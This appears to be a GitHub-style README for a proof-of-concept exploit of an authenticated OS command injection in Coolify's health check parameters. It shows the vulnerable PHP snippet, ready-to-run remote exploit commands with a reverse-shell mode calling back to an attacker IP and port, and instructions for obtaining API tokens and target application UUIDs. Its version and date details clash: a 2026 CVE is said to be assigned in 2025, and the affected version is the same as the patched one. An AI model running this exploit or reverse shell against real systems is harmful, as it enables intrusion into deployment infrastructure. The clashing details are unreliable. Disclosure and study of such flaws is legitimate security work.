Share
## https://sploitus.com/exploit?id=C9D8D26E-43CB-5CB0-AF87-263E8FED095F
# ๐Ÿšจ CVE-2026-59734 โ€” Coolify RCE Exploit
  ### OS Command Injection in Health Check โ†’ Remote Code Execution

  [![CVE](https://img.shields.io/badge/CVE-2026--59734-red.svg?style=for-the-badge&logo=cve)](https://github.com/coollabsio/coolify/security/advisories/GHSA-4fhp-xqqp-w7vv)
  [![CVSS](https://img.shields.io/badge/CVSS-8.8_High-orange.svg?style=for-the-badge)](https://nvd.nist.gov/vuln-metrics/cvss)
  [![Advisory](https://img.shields.io/badge/GHSA-4fhp--xqqp--w7vv-purple.svg?style=for-the-badge)](https://github.com/coollabsio/coolify/security/advisories/GHSA-4fhp-xqqp-w7vv)
  [![Patched](https://img.shields.io/badge/Patched-v4.0.0--beta.469-brightgreen.svg?style=for-the-badge)](#)
  [![Author](https://img.shields.io/badge/Author-CyberTechAjju-black.svg?style=for-the-badge&logo=github)](https://github.com/cybertechajju)

  

  
  

  

  Proof-of-Concept exploit for OS Command Injection in Coolify's health check configuration.
  Any authenticated user could execute arbitrary commands inside deployed containers.

  ---


## ๐ŸŽฏ About the Vulnerability

**[Coolify](https://coolify.io)** is a popular open-source, self-hosted deployment platform (30K+ GitHub stars) โ€” a free alternative to Heroku, Vercel, and Netlify.

A critical **OS Command Injection** vulnerability was discovered in Coolify's health check configuration. The `health_check_host`, `health_check_method`, and `health_check_path` parameters are directly interpolated into shell commands **without any sanitization**, allowing any authenticated user to execute arbitrary commands inside deployment containers.

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ CVE ID           โ”‚ CVE-2026-59734                       โ”‚
โ”‚ Type             โ”‚ OS Command Injection (CWE-78)        โ”‚
โ”‚ Severity         โ”‚ HIGH โ€” CVSS 8.8                      โ”‚
โ”‚ Attack Vector    โ”‚ Network (Authenticated)              โ”‚
โ”‚ Affected         โ”‚ Coolify = v4.0.0-beta.469           โ”‚
โ”‚ Fix Commit       โ”‚ 23f9156c7                            โ”‚
โ”‚ Reporter         โ”‚ CyberTechAjju                        โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```


๐Ÿ”ฅ Vulnerable Code (Click to expand)

```php
// app/Jobs/ApplicationDeploymentJob.php โ€” generate_healthcheck_commands()

// โš ๏ธ User input directly in shell command โ€” NO escapeshellarg()!
$generated_healthchecks_commands = [
    "curl -s -X {$this->application->health_check_method} -f " .
    "{$this->application->health_check_scheme}://" .
    "{$this->application->health_check_host}:" .
    "{$health_check_port}" .
    "{$this->application->health_check_path} > /dev/null || exit 1",
];
```


---

## ๐Ÿ› ๏ธ What This Tool Does

This PoC script validates and exploits CVE-2026-59734 with two modes:

| Mode | Description | Risk |
|:-----|:------------|:-----|
| `--local` | Simulates the vulnerable code pattern offline. **No network requests.** Tests all 3 injectable parameters + verifies the fix. | โœ… Safe |
| `--remote` | Exploits a real Coolify instance via API. Injects payload into health check config and triggers deployment. | โš ๏ธ Auth required |

### Features

- ๐Ÿงช **4 Local Tests** โ€” Validates injection via `host`, `method`, `path` + confirms `escapeshellarg()` fix works
- ๐Ÿ”‘ **Auth Validation** โ€” Checks API token and permissions before attempting exploit
- ๐Ÿ“‹ **Version Detection** โ€” Detects Coolify version and warns if already patched
- ๐ŸŽฏ **Proof Tokens** โ€” Uses unique tokens to prevent false positives
- ๐Ÿš **Reverse Shell Mode** โ€” Built-in reverse shell payload with `--lhost` / `--lport`
- ๐Ÿงน **Cleanup Mode** โ€” Restores original health check config after exploitation
- ๐Ÿ›ก๏ธ **Injection Verification** โ€” Confirms server stored the payload unsanitized

---

## โšก Quick Start

### Local Validation (Safe & Offline)

```bash
git clone https://github.com/cybertechajju/CVE-2026-59734.git
cd CVE-2026-59734
chmod +x coolify_healthcheck_rce_poc.sh

# Run safe local validation
./coolify_healthcheck_rce_poc.sh --local
```

**Expected Output:**

```
โ•โ•โ• LOCAL VULNERABILITY PATTERN VALIDATION โ•โ•โ•

โ”Œโ”€ Test 1: health_check_host injection
โ”‚  โœ… VULNERABLE โ€” Injected command executed successfully

โ”Œโ”€ Test 2: health_check_method injection
โ”‚  โœ… VULNERABLE โ€” Method parameter also injectable

โ”Œโ”€ Test 3: health_check_path injection
โ”‚  โœ… VULNERABLE โ€” Path parameter also injectable

โ”Œโ”€ Test 4: Verify that escapeshellarg() fixes the issue
โ”‚  โœ… SAFE โ€” Sanitized input prevents injection
```

---

### Remote Exploit (Authorized Testing Only)

```bash
# Basic PoC โ€” writes proof file inside the container
./coolify_healthcheck_rce_poc.sh --remote \
  --url https://your-coolify-instance:3000 \
  --token YOUR_API_TOKEN \
  --uuid YOUR_APP_UUID

# Reverse shell
./coolify_healthcheck_rce_poc.sh --remote \
  --url https://your-coolify-instance:3000 \
  --token YOUR_API_TOKEN \
  --uuid YOUR_APP_UUID \
  --lhost YOUR_IP \
  --lport 4444

# With auto-cleanup (restores original config after exploit)
./coolify_healthcheck_rce_poc.sh --remote \
  --url https://your-coolify-instance:3000 \
  --token YOUR_API_TOKEN \
  --uuid YOUR_APP_UUID \
  --cleanup
```

---

## ๐Ÿ“‹ All Options

```
Usage:

  Local Validation (safe, offline):
    ./coolify_healthcheck_rce_poc.sh --local

  Remote Exploit (requires auth):
    ./coolify_healthcheck_rce_poc.sh --remote --url  --token  --uuid  [OPTIONS]

Options:
  --url       Coolify instance URL (e.g. https://coolify.example.com)
  --token     API Bearer token
  --uuid      Target application UUID
  --payload   Custom injection payload
  --lhost     Attacker IP for reverse shell
  --lport     Attacker port for reverse shell (default: 4444)
  --cleanup   Restore original config after exploit
```

---

## ๐Ÿ” How to Get API Token & App UUID

**API Token:**
1. Login to Coolify dashboard
2. Go to **Settings โ†’ API Tokens**
3. Generate a new token

**App UUID:**
```bash
curl -s https://YOUR-COOLIFY/api/v1/applications \
  -H "Authorization: Bearer YOUR_TOKEN" | jq '.[].uuid'
```

---

## ๐Ÿ“– Full Writeup

I wrote a detailed blog post explaining the entire discovery, exploitation, and lessons learned:

๐Ÿ”— **[How I Found an OS Command Injection (RCE) in Coolify โ€” Medium](https://medium.com/@cybertechajju/how-i-found-an-os-command-injection-rce-in-coolify-a93ffce24e74)**

---

## ๐ŸŽฅ Video Walkthrough

Watch the full exploitation demo on YouTube:

๐Ÿ”— **[CVE-2026-59734 โ€” Coolify RCE Demo โ€” YouTube](https://youtube.com/@cybertechajju)**

---

## โœ… Timeline

| Date | Event |
|:-----|:------|
| **Jan 6, 2025** | ๐Ÿ” Discovered & reported via GitHub Security Advisory |
| **Jan 16, 2025** | โœ… Report accepted by Coolify maintainer |
| **Feb 24, 2025** | ๐Ÿ”ฌ Investigation confirmed |
| **Mar 18, 2025** | ๐Ÿ”ง Fix committed ([`23f9156c7`](https://github.com/coollabsio/coolify/commit/23f9156c7)) |
| **Apr 12, 2025** | ๐Ÿ“ฆ Fix released in v4.0.0-beta.469 |
| **Jul 2025** | ๐Ÿท๏ธ CVE-2026-59734 assigned & advisory published |

---

## โš ๏ธ Legal Disclaimer

> **This tool is provided for EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.**

This PoC is intended for security researchers and bug bounty hunters to test systems they have **explicit, documented permission** to audit. Unauthorized use against systems you do not own is strictly prohibited and may violate local, state, and federal laws.

The author (**CyberTechAjju**) assumes no liability and is not responsible for any misuse or damage caused by this tool.

---



  ### ๐Ÿ† More CVEs by CyberTechAjju

  | CVE | Target | Type | Severity |
  |:----|:-------|:-----|:---------|
  | [CVE-2026-45156](https://github.com/cybertechajju/CVE-2026-45156) | Nextcloud user_oidc | JWT Signature Bypass | ๐Ÿ”ด Critical (9.8) |
  | **CVE-2026-59734** | **Coolify** | **OS Command Injection** | **๐ŸŸ  High (8.8)** |

  

  
  
  

  

  "They forgot to sanitize. I didn't forget to report."
  ๐Ÿ‡ฎ๐Ÿ‡ณ Hack the planet. ๐ŸŒŽ๐Ÿ’ป